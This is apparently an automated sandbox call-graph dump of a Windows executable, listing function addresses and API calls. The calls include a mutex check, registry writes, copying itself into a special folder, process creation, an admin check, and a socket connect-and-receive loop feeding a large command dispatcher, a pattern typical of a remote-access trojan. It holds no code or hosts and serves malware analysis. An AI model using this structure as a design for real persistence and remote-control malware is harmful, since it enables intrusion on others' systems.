8014 405637 8013->8014 8265 401da8 8014->8265 8017 40edaa 8373 40230d 8017->8373 8022 4033ab 4 API calls 8023 40edf2 8022->8023 8024 4031fd 3 API calls 8023->8024 8025 40edfa 8024->8025 8393 4058fb VirtualFree 8025->8393 8027 40ee02 8028 4033f3 3 API calls 8027->8028 8029 40ee0e 8028->8029 8030 4030fb 5 API calls 8029->8030 8031 40ee19 8030->8031 8394 4058fb VirtualFree 8031->8394 8033 40ee21 8034 4033ab 4 API calls 8033->8034 8035 40ee2e 8034->8035 8036 4031fd 3 API calls 8035->8036 8037 40ee37 8036->8037 8395 4058fb VirtualFree 8037->8395 8039 40ee3f 8040 4033ab 4 API calls 8039->8040 8041 40ee4c 8040->8041 8042 4031fd 3 API calls 8041->8042 8043 40ee55 8042->8043 8396 4058fb VirtualFree 8043->8396 8045 40ee5d 8046 4033ab 4 API calls 8045->8046 8047 40ee6a 8046->8047 8048 4031fd 3 API calls 8047->8048 8049 40ee73 8048->8049 8397 4058fb VirtualFree 8049->8397 8051 40ee7b 8398 40eb4b 8051->8398 8054 40ef35 8078 4049f9 8054->8078 8055 40ef03 8056 40ef2d 8055->8056 8420 40d1e6 8055->8420 8060 402dff 2 API calls 8056->8060 8060->8054 8062 402e12 2 API calls 8064 40eecb 8062->8064 8063 4031fd 3 API calls 8065 40ef25 8063->8065 8066 4053aa 8 API calls 8064->8066 8429 4058fb VirtualFree 8065->8429 8068 40eed5 8066->8068 8069 405b00 4 API calls 8068->8069 8070 40eedd 8069->8070 8414 402ca1 8070->8414 8073 4031fd 3 API calls 8074 40eef0 8073->8074 8419 4058fb VirtualFree 8074->8419 8076 40eef8 8077 402dff 2 API calls 8076->8077 8077->8055 8442 40536c 8078->8442 8080 404a0d 8447 401d11 8080->8447 8083 402f89 VirtualAlloc 8084 404a2f 8083->8084 8084->7934 8086 40d1e6 10 API calls 8085->8086 8087 40ec28 8086->8087 8463 40326d 8087->8463 8092 40ea99 RegCloseKey 8093 40ec4a 8092->8093 8094 40ec5f 8093->8094 8098 40ed1b 8093->8098 8472 40d51c 8094->8472 8095 40ed8e 8494 4058fb VirtualFree 8095->8494 8097 40ed30 8101 40eb4b 5 API calls 8097->8101 8098->8095 8098->8097 8100 4031fd 3 API calls 8098->8100 8100->8097 8104 40ed45 8101->8104 8103 4031fd 3 API calls 8106 40ec73 8103->8106 8104->8095 8109 4033f3 3 API calls 8104->8109 8105 40ed99 8495 4058fb VirtualFree 8105->8495 8477 4058fb VirtualFree 8106->8477 8112 40ed55 8109->8112 8110 40eda1 8110->7937 8110->7945 8111 40ec7b 8478 40d4d0 SHCreateDirectoryExW 8111->8478 8488 402da3 8112->8488 8115 40ec83 8117 4033f3 3 API calls 8115->8117 8119 40ec8f 8117->8119 8118 40eb18 RegSetValueExW 8120 40ed70 8118->8120 8121 403230 9 API calls 8119->8121 8493 4058fb VirtualFree 8120->8493 8123 40ec9c 8121->8123 8125 4030fb 5 API calls 8123->8125 8124 40ed7a 8126 402dff 2 API calls 8124->8126 8127 40eca7 8125->8127 8128 40ed82 8126->8128 8479 4058fb VirtualFree 8127->8479 8128->8095 8130 40ea99 RegCloseKey 8128->8130 8130->8095 8131 40ecaf CopyFileW 8131->8095 8132 40ecc4 8131->8132 8480 402fe7 8132->8480 8135 4053aa 8 API calls 8136 40ecda 8135->8136 8151 404988 8146->8151 8147 4056c3 lstrlenW lstrcpyW VirtualAlloc 8147->8151 8150 4058fb VirtualFree 8150->8151 8151->8147 8151->8150 8152 4049d9 Sleep 8151->8152 8533 40331a 8151->8533 8550 405294 8151->8550 8561 4050cc 8151->8561 8152->8151 8154 4049f4 8152->8154 8154->7944 8156 403423 8155->8156 8157 403405 8155->8157 8162 40e6c4 8156->8162 8158 403027 lstrlenW 8157->8158 8159 40340c 8158->8159 10431 40590a VirtualAlloc 8159->10431 8161 403418 lstrcpyW 8161->8156 8163 401052 8162->8163 8164 40e6dc CreateProcessW 8163->8164 8165 40e709 8164->8165 8166 4058fb VirtualFree 8165->8166 8166->7957 8167->7959 8169 40f6e8 8168->8169 8170 40f64f 8168->8170 8169->7939 8171 40f6d8 8170->8171 8172 40f658 VirtualAlloc GetWindowsDirectoryA lstrlenA 8170->8172 10432 40f7cd CreateToolhelp32Snapshot 8171->10432 8174 40f68f 8172->8174 8176 40f69e CreateProcessA 8174->8176 8175 40f6dd 8175->8169 10439 40f6ed OpenProcess GetCurrentProcessId 8175->10439 8176->8169 8178 40f6c8 Sleep 8176->8178 8178->8175 10447 4058fb VirtualFree 8179->10447 8181 40471d 10448 40566c 8181->10448 8277 40d9f6 8191->8277 8195 4054b9 GetModuleHandleA 8196 40de6e 8195->8196 8197 40de8a 8196->8197 8201 4054cd 8196->8201 8198 40df07 8197->8198 8199 40dea9 8197->8199 8197->8201 8198->8201 8202 402d5a 6 API calls 8198->8202 8282 402d5a 8199->8282 8201->7967 8207 40df25 8202->8207 8204 40debf 8204->8201 8285 40e5e2 8204->8285 8289 4021d9 8204->8289 8205 40e5e2 6 API calls 8205->8207 8207->8201 8207->8205 8208 4021d9 6 API calls 8207->8208 8208->8207 8210 4054ea 8209->8210 8216 40ddf3 8209->8216 8220 4058fb VirtualFree 8210->8220 8213 403185 4 API calls 8213->8216 8216->8210 8216->8213 8217 402dff 2 API calls 8216->8217 8218 40de58 8216->8218 8315 4056f9 LoadLibraryA GetProcAddress 8216->8315 8320 40e618 8216->8320 8323 403169 lstrcmpA 8216->8323 8324 4058fb VirtualFree 8216->8324 8217->8216 8325 4022e1 8218->8325 8220->7972 8330 405955 GetProcessHeap RtlAllocateHeap 8221->8330 8223 402e24 8223->7974 8225 402c7d 8224->8225 8227 402c82 8224->8227 8331 405955 GetProcessHeap RtlAllocateHeap 8225->8331 8227->7976 8229 402e08 8228->8229 8230 402e0d 8228->8230 8332 405944 GetProcessHeap HeapFree 8229->8332 8232 4053f7 8230->8232 8333 402c1e 8232->8333 8235 402e12 2 API calls 8236 40542a 8235->8236 8340 4053aa 8236->8340 8241 402dff 2 API calls 8242 405447 8241->8242 8243 40f56d 8242->8243 8244 40f581 8243->8244 8252 40552e 8243->8252 8363 4059a9 GetProcessHeap HeapAlloc 8244->8363 8246 40f58d 8247 4033ab 4 API calls 8246->8247 8248 40f5b0 8247->8248 8249 4031fd 3 API calls 8248->8249 8250 40f5b8 8249->8250 8364 4058fb VirtualFree 8250->8364 8253 4031fd 8252->8253 8254 403228 8253->8254 8255 40320f 8253->8255 8260 4058fb VirtualFree 8254->8260 8365 40314a 8255->8365 8257 403216 8258 405878 VirtualAlloc 8257->8258 8259 40321d lstrcpyW 8258->8259 8259->8254 8260->7986 8261->7992 8262->7998 8263->8004 8264->8010 8266 401db2 8265->8266 8267 401db8 8265->8267 8268 401dd3 2 API calls 8266->8268 8269 402dff 2 API calls 8267->8269 8268->8267 8270 401dcb 8269->8270 8368 40dc4d 8270->8368 8274 40da25 8372 4058fb VirtualFree 8274->8372 8276 405642 8276->8017 8281 40ddc0 CreateMutexA 8277->8281 8279 40da06 8280 4059a9 GetProcessHeap HeapAlloc 8279->8280 8280->8195 8281->8279 8301 40591b 8282->8301 8284 402d70 8284->8204 8286 40e5fb 8285->8286 8287 402d5a 6 API calls 8286->8287 8288 40e610 8287->8288 8288->8204 8290 4021f3 8289->8290 8292 4022a7 8289->8292 8310 4059a9 GetProcessHeap HeapAlloc 8290->8310 8293 402c65 2 API calls 8292->8293 8294 4022cf 8293->8294 8295 402dff 2 API calls 8294->8295 8296 4022da 8295->8296 8296->8204 8297 402298 8297->8292 8311 401dd3 8297->8311 8298 40221c 8298->8297 8300 402c65 2 API calls 8298->8300 8300->8298 8302 405926 8301->8302 8303 40591f GetProcessHeap RtlAllocateHeap 8301->8303 8305 405932 GetProcessHeap HeapReAlloc 8302->8305 8306 40592a 8302->8306 8303->8284 8305->8284 8309 405944 GetProcessHeap HeapFree 8306->8309 8308 40592f 8308->8284 8309->8308 8310->8298 8312 401de5 8311->8312 8313 401df6 8311->8313 8312->8313 8314 402dff 2 API calls 8312->8314 8313->8292 8314->8312 8316 405737 8315->8316 8317 405718 8315->8317 8316->8216 8318 40571c 8317->8318 8319 40572f ExitProcess 8317->8319 8318->8319 8321 402c65 2 API calls 8320->8321 8322 40e640 8321->8322 8322->8216 8323->8216 8324->8216 8326 4056f9 3 API calls 8325->8326 8327 4022f6 8326->8327 8328 40e618 2 API calls 8327->8328 8329 402304 8328->8329 8329->8210 8330->8223 8331->8227 8332->8230 8361 405955 GetProcessHeap RtlAllocateHeap 8333->8361 8335 402c2d 8336 402d5a 6 API calls 8335->8336 8337 402c56 8336->8337 8362 405944 GetProcessHeap HeapFree 8337->8362 8339 402c5d 8339->8235 8341 4053bc 8340->8341 8349 4053de 8340->8349 8343 402c1e 8 API calls 8341->8343 8342 402e12 2 API calls 8344 4053ee 8342->8344 8345 4053ce 8343->8345 8350 405b00 8344->8350 8346 402c65 2 API calls 8345->8346 8347 4053d6 8346->8347 8348 402dff 2 API calls 8347->8348 8348->8349 8349->8342 8351 402e12 2 API calls 8350->8351 8352 405b18 8351->8352 8353 402e12 2 API calls 8352->8353 8354 405b58 8353->8354 8355 402dff 2 API calls 8354->8355 8356 405b60 8355->8356 8357 402dff 2 API calls 8356->8357 8358 405b68 8357->8358 8359 402dff 2 API calls 8358->8359 8360 40543c 8359->8360 8360->8241 8361->8335 8362->8339 8363->8246 8364->8252 8366 403152 lstrlenW 8365->8366 8367 40314f 8365->8367 8366->8257 8367->8257 8369 40da1d 8368->8369 8370 40dc56 CloseHandle 8368->8370 8371 40ddab ReleaseMutex CloseHandle 8369->8371 8370->8369 8371->8274 8372->8276 8374 402c65 2 API calls 8373->8374 8375 40232f 8374->8375 8376 4031fd 3 API calls 8375->8376 8377 40233b 8376->8377 8378 4031fd 3 API calls 8377->8378 8379 402353 8378->8379 8380 4031fd 3 API calls 8379->8380 8381 402365 8380->8381 8382 4031fd 3 API calls 8381->8382 8383 402371 8382->8383 8384 4031fd 3 API calls 8383->8384 8385 402383 8384->8385 8386 402c65 2 API calls 8385->8386 8387 40239b 8386->8387 8388 40d724 GetCurrentProcess OpenProcessToken 8387->8388 8389 40d767 8388->8389 8390 40d747 GetTokenInformation 8388->8390 8391 40d776 8389->8391 8392 40d76d CloseHandle 8389->8392 8390->8389 8391->8022 8392->8391 8393->8027 8394->8033 8395->8039 8396->8045 8397->8051 8399 40eb90 RegOpenKeyExW 8398->8399 8400 40eb5d 8398->8400 8402 40eba4 8399->8402 8430 40d4e2 RegOpenKeyExW 8400->8430 8402->8054 8402->8055 8407 40eaae RegQueryValueExW 8402->8407 8403 40eb67 8403->8399 8404 40eb6b RegCreateKeyExW 8403->8404 8404->8402 8405 40eb89 8404->8405 8435 40ea99 8405->8435 8408 40eadb 8407->8408 8413 40eb0a 8407->8413 8438 4059a9 GetProcessHeap HeapAlloc 8408->8438 8410 40eae3 RegQueryValueExW 8411 40eafe 8410->8411 8410->8413 8412 402d5a 6 API calls 8411->8412 8412->8413 8413->8055 8413->8062 8439 4059a9 GetProcessHeap HeapAlloc 8414->8439 8416 402cc1 8417 4033ab 4 API calls 8416->8417 8418 402ce8 8417->8418 8418->8073 8419->8076 8440 4059a9 GetProcessHeap HeapAlloc 8420->8440 8422 40d1f8 GetModuleFileNameW 8423 4033ab 4 API calls 8422->8423 8424 40d214 8423->8424 8425 4031fd 3 API calls 8424->8425 8426 40d21c 8425->8426 8441 4058fb VirtualFree 8426->8441 8428 40d224 8428->8063 8429->8056 8431 40d503 8430->8431 8432 40d507 8430->8432 8431->8403 8433 40d516 8432->8433 8434 40d50d RegCloseKey 8432->8434 8433->8403 8434->8433 8436 40eaa1 RegCloseKey 8435->8436 8437 40eaa9 8435->8437 8436->8437 8437->8399 8438->8410 8439->8416 8440->8422 8441->8428 8443 402f89 VirtualAlloc 8442->8443 8444 405375 8443->8444 8462 40ddc0 CreateMutexA 8444->8462 8446 40538f WSAStartup 8446->8080 8448 402e12 2 API calls 8447->8448 8449 401d33 8448->8449 8450 4033f3 3 API calls 8449->8450 8451 401d3f 8450->8451 8452 4033f3 3 API calls 8451->8452 8453 401d57 8452->8453 8454 4033f3 3 API calls 8453->8454 8455 401d69 8454->8455 8456 4033f3 3 API calls 8455->8456 8457 401d75 8456->8457 8458 4033f3 3 API calls 8457->8458 8459 401d87 8458->8459 8460 402e12 2 API calls 8459->8460 8461 401d9f 8460->8461 8461->8083 8462->8446 8496 4010ad GetProcessHeap RtlAllocateHeap 8463->8496 8465 403289 8497 403085 8465->8497 8469 4032da 8470 40ea59 RegCreateKeyExW 8469->8470 8471 40ea84 8470->8471 8471->8092 8473 401052 8472->8473 8474 40d53e SHGetSpecialFolderPathW 8473->8474 8475 4033ab 4 API calls 8474->8475 8476 40d561 8475->8476 8476->8103 8477->8111 8478->8115 8479->8131 8481 40314a lstrlenW 8480->8481 8482 402ffd 8481->8482 8483 402d5a 6 API calls 8482->8483 8484 403006 8483->8484 8484->8135 8489 40314a lstrlenW 8488->8489 8490 402dbb 8489->8490 8491 402d5a 6 API calls 8490->8491 8492 402dc4 8491->8492 8492->8118 8493->8124 8494->8105 8495->8110 8496->8465 8498 403185 4 API calls 8497->8498 8499 40309b 8498->8499 8509 402e63 8499->8509 8502 4030fb 5 API calls 8503 4030aa 8502->8503 8526 4058fb VirtualFree 8503->8526 8505 4030b2 8527 4058fb VirtualFree 8505->8527 8507 4030be 8508 4010c1 GetProcessHeap HeapFree 8507->8508 8508->8469 8528 402e52 8509->8528 8511 402e7a 8512 402ee2 8511->8512 8513 402e52 lstrlenA 8511->8513 8512->8502 8514 402e87 MultiByteToWideChar 8513->8514 8515 405878 VirtualAlloc 8514->8515 8516 402ea1 8515->8516 8517 402e52 lstrlenA 8516->8517 8518 402eab MultiByteToWideChar 8517->8518 8519 4033ab 4 API calls 8518->8519 8520 402eca 8519->8520 8521 4031fd 3 API calls 8520->8521 8522 402ed3 8521->8522 8531 4058fb VirtualFree 8522->8531 8524 402edb 8532 4058fb VirtualFree 8524->8532 8526->8505 8527->8507 8529 402e60 8528->8529 8530 402e57 lstrlenA 8528->8530 8529->8511 8530->8511 8531->8524 8532->8512 8534 402f89 VirtualAlloc 8533->8534 8535 40332d 8534->8535 8536 403399 8535->8536 8537 403027 lstrlenW 8535->8537 8536->8151 8538 40333e WideCharToMultiByte 8537->8538 8583 40590a VirtualAlloc 8538->8583 8540 403356 8541 403027 lstrlenW 8540->8541 8542 403368 WideCharToMultiByte 8541->8542 8543 403185 4 API calls 8542->8543 8544 403381 8543->8544 8545 402eeb 4 API calls 8544->8545 8546 40338a 8545->8546 8584 4058fb VirtualFree 8546->8584 8548 403392 8585 4058fb VirtualFree 8548->8585 8551 402eeb 4 API calls 8550->8551 8552 4052ac 8551->8552 8586 40dd97 WaitForSingleObject 8552->8586 8554 4052bd getaddrinfo 8555 4052eb socket 8554->8555 8558 405345 8554->8558 8556 405306 htons freeaddrinfo connect 8555->8556 8555->8558 8556->8558 8559 40535b ReleaseMutex 8556->8559 8587 4058fb VirtualFree 8558->8587 8559->8558 8560 405352 8560->8151 8562 4050d9 8561->8562 8563 4050eb setsockopt 8562->8563 8564 40528d 8562->8564 8565 40511f 8563->8565 8564->8152 8566 403185 4 API calls 8565->8566 8567 40512f 8566->8567 8588 402dcc 8567->8588 8571 405162 recv 8572 405275 8571->8572 8582 405140 8571->8582 8573 402dff 2 API calls 8572->8573 8574 405285 8573->8574 8577 402dff 2 API calls 8574->8577 8575 402d5a 6 API calls 8575->8582 8576 402e12 GetProcessHeap RtlAllocateHeap 8576->8582 8577->8564 8578 405b00 GetProcessHeap HeapFree GetProcessHeap RtlAllocateHeap 8578->8582 8579 402d8c GetProcessHeap HeapFree 8579->8582 8580 402dff GetProcessHeap HeapFree 8580->8582 8582->8571 8582->8575 8582->8576 8582->8578 8582->8579 8582->8580 8594 404a77 8582->8594 8583->8540 8584->8548 8585->8536 8586->8554 8587->8560 8589 403138 lstrlenA 8588->8589 8590 402de4 8589->8590 8591 402d5a 6 API calls 8590->8591 8592 402ded 8591->8592 8593 4058fb VirtualFree 8592->8593 8593->8582 8595 404a89 8594->8595 8596 404a9e 8594->8596 8595->8596 8700 404fdc 8595->8700 8799 402d8c 8595->8799 8597 402d5a 6 API calls 8596->8597 8596->8700 8599 404aed 8597->8599 8600 404afb 8599->8600 8601 404d5c 8599->8601 8604 404b01 8600->8604 8605 404d37 8600->8605 8602 404e94 8601->8602 8603 404d65 8601->8603 8606 404f42 8602->8606 8607 404e9d 8602->8607 8608 404e76 8603->8608 8614 404d6b 8603->8614 8609 404b0a 8604->8609 8610 404c2d 8604->8610 8821 4059a9 GetProcessHeap HeapAlloc 8605->8821 8843 4059a9 GetProcessHeap HeapAlloc 8606->8843 8613 404f2c 8607->8613 8622 404ea8 8607->8622 8829 4059a9 GetProcessHeap HeapAlloc 8608->8829 8617 404b10 8609->8617 8618 404c0f 8609->8618 8619 404d16 8610->8619 8620 404c36 8610->8620 8842 4059a9 GetProcessHeap HeapAlloc 8613->8842 8615 404e44 8614->8615 8623 404e3c 8614->8623 8624 404d7f 8614->8624 8667 404b47 8615->8667 8828 4059a9 GetProcessHeap HeapAlloc 8615->8828 8629 404bf2 8617->8629 8630 404b18 8617->8630 8810 4059a9 GetProcessHeap HeapAlloc 8618->8810 8820 4059a9 GetProcessHeap HeapAlloc 8619->8820 8631 404c41 8620->8631 8632 404cf9 8620->8632 8621 404f1a 8834 40f25f 8621->8834 8622->8621 8638 404eb2 8622->8638 8639 404f0c 8622->8639 8827 4059a9 GetProcessHeap HeapAlloc 8623->8827 8634 404d87 8624->8634 8635 404e1f 8624->8635 8809 4059a9 GetProcessHeap HeapAlloc 8629->8809 8642 404b23 8630->8642 8643 404bd5 8630->8643 8644 404c49 8631->8644 8645 404cdc 8631->8645 8819 4059a9 GetProcessHeap HeapAlloc 8632->8819 8647 404e02 8634->8647 8648 404d8b 8634->8648 8826 4059a9 GetProcessHeap HeapAlloc 8635->8826 8652 404ee5 8638->8652 8669 404eba 8638->8669 8670 404edd 8638->8670 8833 4059a9 GetProcessHeap HeapAlloc 8639->8833 8640 404c17 8640->8667 8811 4038cc 8640->8811 8654 404bb8 8642->8654 8655 404b2b 8642->8655 8808 4059a9 GetProcessHeap HeapAlloc 8643->8808 8656 404c4d 8644->8656 8657 404cbf 8644->8657 8818 4059a9 GetProcessHeap HeapAlloc 8645->8818 8825 4059a9 GetProcessHeap HeapAlloc 8647->8825 8664 404de5 8648->8664 8665 404d8f 8648->8665 8652->8667 8832 4059a9 GetProcessHeap HeapAlloc 8652->8832 8807 4059a9 GetProcessHeap HeapAlloc 8654->8807 8658 404b9e 8655->8658 8659 404b2f 8655->8659 8660 404c51 8656->8660 8661 404ca2 8656->8661 8817 4059a9 GetProcessHeap HeapAlloc 8657->8817 8806 4059a9 GetProcessHeap HeapAlloc 8658->8806 8673 404b33 8659->8673 8674 404b7d 8659->8674 8675 404c85 8660->8675 8676 404c55 8660->8676 8816 4059a9 GetProcessHeap HeapAlloc 8661->8816 8663 404f14 8663->8621 8663->8667 8824 4059a9 GetProcessHeap HeapAlloc 8664->8824 8678 404d93 8665->8678 8679 404dc8 8665->8679 8712 404753 8667->8712 8669->8667 8830 4059a9 GetProcessHeap HeapAlloc 8669->8830 8831 4059a9 GetProcessHeap HeapAlloc 8670->8831 8683 404b37 8673->8683 8684 404b5c 8673->8684 8805 4059a9 GetProcessHeap HeapAlloc 8674->8805 8815 4059a9 GetProcessHeap HeapAlloc 8675->8815 8676->8667 8814 4059a9 GetProcessHeap HeapAlloc 8676->8814 8678->8667 8822 4059a9 GetProcessHeap HeapAlloc 8678->8822 8823 4059a9 GetProcessHeap HeapAlloc 8679->8823 8683->8667 8803 4059a9 GetProcessHeap HeapAlloc 8683->8803 8804 4059a9 GetProcessHeap HeapAlloc 8684->8804 8691 404f75 8698 402e12 2 API calls 8691->8698 8692 404fc7 8696 404fc5 8692->8696 8697 402d8c 2 API calls 8692->8697 8696->8700 8702 402d8c 2 API calls 8696->8702 8697->8696 8699 404f81 8698->8699 8701 402c1e 8 API calls 8699->8701 8700->8582 8703 404f9c 8701->8703 8702->8700 8704 402c65 2 API calls 8703->8704 8705 404fa7 8704->8705 8706 404a77 267 API calls 8705->8706 8707 404fb5 8706->8707 8708 402dff 2 API calls 8707->8708 8709 404fbd 8708->8709 8710 402dff 2 API calls 8709->8710 8710->8696 8713 404766 8712->8713 8775 4047ae 8712->8775 8714 404772 8713->8714 8715 40487f 8713->8715 8718 404874 8714->8718 8719 404778 8714->8719 8716 404900 8715->8716 8717 404884 8715->8717 8723 404944 8716->8723 8724 404905 8716->8724 8726 4048f7 8717->8726 8727 40488f 8717->8727 8717->8775 9040 410e42 8718->9040 8720 404781 8719->8720 8721 404808 8719->8721 8728 404783 8720->8728 8729 4047fc 8720->8729 8730 404868 8721->8730 8731 40480d 8721->8731 9270 402579 8723->9270 8732 404911 8724->8732 8733 40493d 8724->8733 8724->8775 9237 40b13c 8726->9237 8735 404896 8727->8735 8736 4048ef 8727->8736 8737 404788 8728->8737 8738 4047eb 8728->8738 8984 402888 8729->8984 9035 402873 8730->9035 8739 404814 8731->8739 8740 40485e 8731->8740 8743 404916 8732->8743 8744 40492f 8732->8744 9265 4027e0 8733->9265 8745 4048e5 8735->8745 8746 40489a 8735->8746 9206 40264b 8736->9206 8747 4047e1 8737->8747 8748 40478f 8737->8748 8844 402aff GetModuleFileNameA 8738->8844 8749 404850 8739->8749 8750 404818 8739->8750 9022 40282b 8740->9022 8755 404926 8743->8755 8767 40491a 8743->8767 9254 40253b 8744->9254 9197 408431 InitializeCriticalSection DeleteCriticalSection EnterCriticalSection GetModuleHandleA 8745->9197 8756 4048dd 8746->8756 8757 40489e 8746->8757 8971 402aa1 8747->8971 8758 404793 8748->8758 8759 4047d7 8748->8759 9013 40fab3 8749->9013 8760 404846 8750->8760 8761 40481c 8750->8761 9248 402505 8755->9248 9191 4083eb EnterCriticalSection 8756->9191 8768 4048a2 8757->8768 8769 4048ce 8757->8769 8771 404797 8758->8771 8772 4047cb 8758->8772 8958 402a5a 8759->8958 9007 40fa7c 8760->9007 8773 404820 8761->8773 8774 40483c 8761->8774 8765 4048f5 8765->8775 8767->8775 9245 4024ee 8767->9245 8780 4048a6 8768->8780 8781 4048bd 8768->8781 9083 40c442 InitializeCriticalSection DeleteCriticalSection EnterCriticalSection 8769->9083 8782 40479b 8771->8782 8783 4047bf 8771->8783 8943 402a07 8772->8943 8784 404960 8773->8784 8785 404828 8773->8785 8895 402803 8774->8895 8775->8691 8775->8692 8780->8775 9061 40b46d EnterCriticalSection 8780->9061 9070 4025d2 8781->9070 8789 4047b3 8782->8789 8790 40479f 8782->8790 8938 4029f8 8783->8938 9281 4027d9 8784->9281 8785->8775 8870 402747 8785->8870 8913 40296e SetLastError 8789->8913 8790->8775 8898 402919 8790->8898 8800 402d95 8799->8800 8801 402d9a 8799->8801 10421 405944 GetProcessHeap HeapFree 8800->10421 8801->8596 8803->8667 8804->8667 8805->8667 8806->8667 8807->8667 8808->8667 8809->8667 8810->8640 8812 402f89 VirtualAlloc 8811->8812 8813 4038dd 8812->8813 8813->8667 8814->8667 8815->8667 8816->8667 8817->8667 8818->8667 8819->8667 8820->8667 8821->8667 8822->8667 8823->8667 8824->8667 8825->8667 8826->8667 8827->8615 8828->8667 8829->8667 8830->8667 8831->8652 8832->8667 8833->8663 8835 401052 8834->8835 8836 40f276 GetModuleFileNameW IsUserAnAdmin 8835->8836 8837 404f2a 8836->8837 8838 40f28c 8836->8838 8837->8667 10422 40f1ec RegOpenKeyExW 8838->10422 8840 40f291 FindResourceW LoadResource SizeofResource LockResource 10425 40f159 8840->10425 8842->8667 8843->8667 9300 40f5c8 8844->9300 8846 402b35 8847 4033ab 4 API calls 8846->8847 8848 402b59 8847->8848 9303 40d7a6 GetComputerNameW 8848->9303 8853 40d724 4 API calls 8854 402b6c 8853->8854 9309 40d56a LoadLibraryA 8854->9309 8871 4033f3 3 API calls 8870->8871 8872 40275f 8871->8872 9438 40dd2b 8872->9438 8875 4033f3 3 API calls 8876 402770 PathFileExistsW 8875->8876 9445 4058fb VirtualFree 8876->9445 8878 402783 8879 402793 8878->8879 8880 402788 8878->8880 9455 40dcba CreateFileW 8879->9455 9453 40dcf9 CreateFileW 8880->9453 8883 402791 8884 4027a0 8883->8884 8884->8883 8896 404a3d 26 API calls 8895->8896 8897 402818 8896->8897 8897->8775 9469 40e7e1 OpenProcess 8898->9469 8900 40292e 8901 402932 8900->8901 8902 40293d GetLastError 8900->8902 8903 402aa1 41 API calls 8901->8903 8905 402939 8902->8905 8903->8905 9472 40e764 CreateToolhelp32Snapshot 8905->9472 8906 402950 9480 403ed1 8906->9480 8909 404a3d 26 API calls 8910 402961 8909->8910 9485 403eba 8910->9485 8914 4033f3 3 API calls 8913->8914 8915 402990 8914->8915 9490 40da33 DeleteFileW 8915->9490 8917 402995 8918 4029c9 GetLastError 8917->8918 8919 40299a 8917->8919 8937 4029c7 8918->8937 8920 4033f3 3 API calls 8919->8920 8922 4029a3 8920->8922 8921 4033f3 3 API calls 8923 4029da 8921->8923 8924 4033f3 3 API calls 8922->8924 9502 403bc4 8923->9502 8926 4029af 8924->8926 9493 403718 8926->9493 8929 404a3d 26 API calls 8937->8921 9515 40124d 8938->9515 8942 402a06 8942->8775 8944 4033f3 3 API calls 8943->8944 8945 402a1c 8944->8945 9665 40da4f 8945->9665 8947 402a24 9683 401301 8947->9683 9729 40db53 8958->9729 8960 402a6b 9751 401348 8960->9751 9798 40e80f 8971->9798 8973 402ab3 9826 4012ba 8973->9826 8978 404a3d 26 API calls 8979 402ad1 8978->8979 8985 403185 4 API calls 8984->8985 8986 4028a1 8985->8986 9874 403169 lstrcmpA 8986->9874 8988 4028a9 9875 4058fb VirtualFree 8988->9875 8990 4028c4 8991 4028d0 8990->8991 8992 4028c8 8990->8992 8994 403185 4 API calls 8991->8994 9876 40cdaa 8992->9876 8995 4028dd 8994->8995 9887 403169 lstrcmpA 8995->9887 8996 4028ce 8996->8775 8998 4028e5 9888 4058fb VirtualFree 8998->9888 9000 4028ef 9001 4028f3 9000->9001 9002 402906 9000->9002 9889 40ca7e 9001->9889 9905 4031bb 9002->9905 10011 40dd97 WaitForSingleObject 9007->10011 9009 40fa86 9010 40faa6 ReleaseMutex 9009->9010 10012 4103a6 9009->10012 9010->8775 9012 40fa9f 9012->9010 10015 40dd97 WaitForSingleObject 9013->10015 9015 40fac0 9016 40fb0d ReleaseMutex 9015->9016 9021 40fae7 9015->9021 10016 4059a9 GetProcessHeap HeapAlloc 9015->10016 9016->8775 9019 40fadb 9019->9021 10017 4105e9 9019->10017 10029 41041f CoInitialize CoCreateInstance 9021->10029 10105 40f953 9022->10105 9029 404a3d 26 API calls 9030 40285b 9029->9030 10133 404326 9030->10133 9036 40124d 3 API calls 9035->9036 9037 40287f 9036->9037 9038 40701b 33 API calls 9037->9038 9039 402886 9038->9039 9039->8775 9041 402e12 2 API calls 9040->9041 9042 410e59 9041->9042 9043 410fa2 9042->9043 9044 410e65 9042->9044 9049 402d5a 6 API calls 9043->9049 9045 410f60 9044->9045 9046 410e6e 9044->9046 9052 402d5a 6 API calls 9045->9052 9047 410f17 9046->9047 9048 410e77 9046->9048 9053 402d5a 6 API calls 9047->9053 9050 410ece 9048->9050 9055 410e7c 9048->9055 9059 410eab 9049->9059 9058 402d5a 6 API calls 9050->9058 9051 410fe8 9054 402dff 2 API calls 9051->9054 9052->9059 9053->9059 9057 410ff0 9054->9057 9055->9051 9060 402d5a 6 API calls 9055->9060 9056 410fe2 SetEvent 9056->9051 9057->8775 9058->9059 9059->9051 9059->9056 9060->9059 10173 401eb9 9061->10173 9064 401eb9 2 API calls 9065 40b494 9064->9065 10176 405021 shutdown closesocket 9065->10176 9067 40b49c 10177 405021 shutdown closesocket 9067->10177 9069 40b4a7 LeaveCriticalSection 9069->8775 9071 40b46d 6 API calls 9070->9071 9072 4025e8 9071->9072 9073 403185 4 API calls 9072->9073 9074 402606 9073->9074 10178 4056c3 9074->10178 9076 402614 9077 40331a 11 API calls 9076->9077 9078 40261b 9077->9078 10181 40b4b1 9078->10181 10209 40bf64 9083->10209 9086 40c4a1 9088 4033ab 4 API calls 9086->9088 9087 40c59c 10268 40d279 LoadLibraryA 9087->10268 9090 40c4ae 9088->9090 10234 40ef92 9090->10234 9093 40c717 9096 4046da 3 API calls 9093->9096 9097 40c72b 9096->9097 9100 404a3d 26 API calls 9097->9100 9099 40c5af 9099->9093 9102 40c5b7 9099->9102 9105 40c733 9100->9105 9104 40d724 4 API calls 9102->9104 9107 40c5bc 9104->9107 9108 4046b7 VirtualFree 9105->9108 9192 408401 9191->9192 9193 408426 LeaveCriticalSection 9191->9193 9194 401eb9 2 API calls 9192->9194 9193->8775 9195 40840b 9194->9195 10313 401e8e CreateThread 9195->10313 9198 4084a3 9197->9198 9199 40848c 9197->9199 9201 401eb9 2 API calls 9198->9201 10315 401e8e CreateThread 9199->10315 9203 4084a8 9201->9203 9202 408497 9204 4084c2 LeaveCriticalSection 9202->9204 10316 401e8e CreateThread 9203->10316 9204->8775 9207 40d51c 5 API calls 9206->9207 9208 402661 9207->9208 9209 40326d 21 API calls 9208->9209 9210 40266c 9209->9210 9211 403230 9 API calls 9210->9211 9212 40267b 9211->9212 9213 4030fb 5 API calls 9212->9213 9214 402683 9213->9214 10319 4058fb VirtualFree 9214->10319 9216 40268b 9217 4033f3 3 API calls 9216->9217 9218 40269a 9217->9218 10320 4032e3 9218->10320 9221 4030fb 5 API calls 9222 4026af 9221->9222 10325 4058fb VirtualFree 9222->10325 9224 4026b7 10326 4058fb 